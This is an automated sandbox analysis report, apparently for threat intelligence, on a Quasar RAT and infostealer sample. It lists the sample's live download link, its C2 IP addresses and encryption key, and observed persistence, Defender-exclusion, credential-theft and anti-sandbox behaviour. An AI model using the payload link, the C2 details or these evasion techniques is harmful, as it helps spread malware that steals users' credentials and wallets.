quasar | hxxps://gofile[.]io/d/bVjuzb

Analysis

max time kernel
325s
max time network
326s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
04-06-2024 20:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/bVjuzb

Score

10^/10

quasar emmassub discovery execution pyinstaller spyware stealer trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

EmmasSub

85.23.24.170:4782

85.23.109.34:4782

82.128.254.93:4782

Mutex

f82c7021-f558-4f6f-bbb3-fbe420c708e5

Attributes

encryption_key
4DC093FC202D016F95DCEE92AAF2874F56ACC3F2
install_name
RuntimeBroker.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windows Update
subdirectory
WindowsSecureManager

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
C:\Program Files (x86)\MyFolder\RunMe.exe	family_quasar
behavioral1/memory/5940-289-0x0000000000B90000-0x0000000000EB4000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

5296 powershell.exe
3300 powershell.exe
4688 powershell.exe
Downloads MZ/PE file

pid	process
5296	powershell.exe
3300	powershell.exe
4688	powershell.exe

Drops startup file 3 IoCs

Processes:

creal.exetaskmgr.execreal.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe	creal.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\creal.exe	taskmgr.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe	creal.exe

Executes dropped EXE 12 IoCs

Processes:

Update.exeUpdate.tmpRunMe.exeRuntimeBroker.execreal.execreal.exeRunMe.exeRunMe.exeRunMe.exeRunMe.execreal.execreal.exe

pid	process
5184	Update.exe
1156	Update.tmp
5940	RunMe.exe
1144	RuntimeBroker.exe
4728	creal.exe
5736	creal.exe
1544	RunMe.exe
4992	RunMe.exe
5640	RunMe.exe
2356	RunMe.exe
1936	creal.exe
64	creal.exe

Loads dropped DLL 64 IoCs

Processes:

creal.execreal.exe

pid	process
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
5736	creal.exe
64	creal.exe
64	creal.exe
64	creal.exe
64	creal.exe
64	creal.exe
64	creal.exe
64	creal.exe
64	creal.exe
64	creal.exe
64	creal.exe
64	creal.exe
64	creal.exe
64	creal.exe
64	creal.exe
64	creal.exe
64	creal.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 49 IoCs

Web Service

T1102

Processes:

flow	ioc
121	discord.com
148	discord.com
98	discord.com
114	discord.com
115	discord.com
119	discord.com
152	discord.com
164	discord.com
102	discord.com
118	discord.com
163	discord.com
122	discord.com
175	discord.com
172	discord.com
86	discord.com
87	discord.com
125	discord.com
159	discord.com
165	discord.com
90	discord.com
110	discord.com
120	discord.com
123	discord.com
144	discord.com
82	discord.com
109	discord.com
146	discord.com
173	discord.com
88	discord.com
162	discord.com
174	discord.com
158	discord.com
168	discord.com
171	discord.com
160	discord.com
108	discord.com
112	discord.com
124	discord.com
113	discord.com
147	discord.com
145	discord.com
149	discord.com
150	discord.com
169	discord.com
89	discord.com
91	discord.com
111	discord.com
161	discord.com
170	discord.com

Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

73 api.ipify.org
75 api.ipify.org
136 api.ipify.org
137 api.ipify.org

flow	ioc
73	api.ipify.org
75	api.ipify.org
136	api.ipify.org
137	api.ipify.org

Drops file in System32 directory 5 IoCs

Processes:

RunMe.exeRuntimeBroker.exe

description	ioc	process
File opened for modification	C:\Windows\system32\WindowsSecureManager	RunMe.exe
File opened for modification	C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe	RuntimeBroker.exe
File opened for modification	C:\Windows\system32\WindowsSecureManager	RuntimeBroker.exe
File created	C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe	RunMe.exe
File opened for modification	C:\Windows\system32\WindowsSecureManager\RuntimeBroker.exe	RunMe.exe

Drops file in Program Files directory 8 IoCs

Processes:

Update.tmp

description	ioc	process
File created	C:\Program Files (x86)\MyFolder\is-QL9VB.tmp	Update.tmp
File created	C:\Program Files (x86)\MyFolder\is-7STDL.tmp	Update.tmp
File created	C:\Program Files (x86)\MyFolder\is-1TH1G.tmp	Update.tmp
File opened for modification	C:\Program Files (x86)\MyFolder\unins000.dat	Update.tmp
File opened for modification	C:\Program Files (x86)\MyFolder\RunMe.exe	Update.tmp
File opened for modification	C:\Program Files (x86)\MyFolder\creal.exe	Update.tmp
File created	C:\Program Files (x86)\MyFolder\unins000.dat	Update.tmp
File created	C:\Program Files (x86)\MyFolder\is-CVE5U.tmp	Update.tmp

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Program Files (x86)\MyFolder\creal.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exetaskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

700 schtasks.exe
2312 schtasks.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

4756 tasklist.exe
2448 tasklist.exe

pid	process
700	schtasks.exe
2312	schtasks.exe

pid	process
4756	tasklist.exe
2448	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 20 IoCs

Processes:

Update.tmpmsedge.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp\DefaultIcon\ = "C:\\Program Files (x86)\\MyFolder\\RunMe.exe,0"	Update.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp\shell	Update.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp\shell\open\command\ = "\"C:\\Program Files (x86)\\MyFolder\\RunMe.exe\" \"%1\""	Update.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\RunMe.exe\SupportedTypes\.myp	Update.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\RunMe.exe\SupportedTypes	Update.tmp
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.myp	Update.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\TstFile.myp	Update.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\TstFile.myp\DefaultIcon	Update.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp	Update.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp\shell\open\command	Update.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\RunMe.exe	Update.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.myp\OpenWithProgids\TstFile.myp	Update.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\TstFile.myp\shell\open\command	Update.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications	Update.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\.myp\OpenWithProgids	Update.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.myp\OpenWithProgids	Update.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp\ = "Tst File"	Update.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TstFile.myp\shell\open	Update.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\Applications\RunMe.exe\SupportedTypes	Update.tmp

NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Unconfirmed 794173.crdownload:SmartScreen msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 794173.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exeUpdate.tmppowershell.exetaskmgr.exe

pid	process
948	msedge.exe
948	msedge.exe
4592	msedge.exe
4592	msedge.exe
1448	identity_helper.exe
1448	identity_helper.exe
2728	msedge.exe
2728	msedge.exe
1156	Update.tmp
1156	Update.tmp
5296	powershell.exe
5296	powershell.exe
5296	powershell.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

1608 taskmgr.exe

pid	process
1608	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

Processes:

msedge.exe

pid	process
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

powershell.exeRunMe.exeRuntimeBroker.exetaskmgr.exetasklist.exeRunMe.exepowershell.exetaskmgr.exepowershell.exeRunMe.exeRunMe.exeRunMe.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	5296	powershell.exe
Token: SeDebugPrivilege	5940	RunMe.exe
Token: SeDebugPrivilege	1144	RuntimeBroker.exe
Token: SeDebugPrivilege	3556	taskmgr.exe
Token: SeSystemProfilePrivilege	3556	taskmgr.exe
Token: SeCreateGlobalPrivilege	3556	taskmgr.exe
Token: SeDebugPrivilege	4756	tasklist.exe
Token: SeDebugPrivilege	1544	RunMe.exe
Token: 33	3556	taskmgr.exe
Token: SeIncBasePriorityPrivilege	3556	taskmgr.exe
Token: SeDebugPrivilege	3300	powershell.exe
Token: SeDebugPrivilege	1608	taskmgr.exe
Token: SeSystemProfilePrivilege	1608	taskmgr.exe
Token: SeCreateGlobalPrivilege	1608	taskmgr.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeDebugPrivilege	4992	RunMe.exe
Token: SeDebugPrivilege	5640	RunMe.exe
Token: SeDebugPrivilege	2356	RunMe.exe
Token: SeDebugPrivilege	2448	tasklist.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exeUpdate.tmptaskmgr.exe

pid	process
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
1156	Update.tmp
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

msedge.exetaskmgr.exe

pid	process
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
4592	msedge.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

RuntimeBroker.exe

pid process

1144 RuntimeBroker.exe

pid	process
1144	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 4592 wrote to memory of 3124	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 3124	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 4372	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 948	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 948	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe
PID 4592 wrote to memory of 1388	4592	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/bVjuzb
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4592

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbf32f46f8,0x7ffbf32f4708,0x7ffbf32f4718
2⤵
PID:3124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,8434925239949957358,8176487384318242335,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
2⤵
PID:4372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,8434925239949957358,8176487384318242335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,8434925239949957358,8176487384318242335,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
2⤵
PID:1388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,8434925239949957358,8176487384318242335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
2⤵
PID:5924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,8434925239949957358,8176487384318242335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
2⤵
PID:2044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,8434925239949957358,8176487384318242335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
2⤵
PID:4248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,8434925239949957358,8176487384318242335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4168 /prefetch:1
2⤵
PID:4948

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,8434925239949957358,8176487384318242335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:8
2⤵
PID:1376

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,8434925239949957358,8176487384318242335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,8434925239949957358,8176487384318242335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
2⤵
PID:4568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,8434925239949957358,8176487384318242335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
2⤵
PID:2272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,8434925239949957358,8176487384318242335,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
2⤵
PID:5260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,8434925239949957358,8176487384318242335,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5884 /prefetch:8
2⤵
PID:1896

